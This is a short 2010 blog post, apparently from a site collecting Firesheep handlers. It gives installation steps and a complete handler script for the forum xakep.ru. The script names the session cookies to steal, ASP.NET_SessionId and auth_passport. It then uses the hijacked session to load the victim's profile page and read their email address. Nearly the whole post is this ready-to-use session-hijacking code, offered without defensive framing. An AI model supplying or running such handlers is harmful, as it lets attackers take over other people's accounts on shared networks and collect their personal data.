Pages

Search This Blog

Friday 12 November 2010

Firesheep => Xakep.ru Handler



Go to Firesheep -> Preferences -> Websites -> and Add this code :


// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/

register({
  name: "Xakep.ru",
  url: 'http://forum.xakep.ru',
  domains: [ 'xakep.ru' ],
  sessionCookieNames: [ 'ASP.NET_SessionId','auth_passport' ],
  identifyUser: function () {
    var req = this.siteUrl + "/editprofile.aspx";
    var resp = this.httpGet(req);
    this.userName   = resp.body.querySelector("input[name='emailori']").value;
  } 
});

No comments:

Post a Comment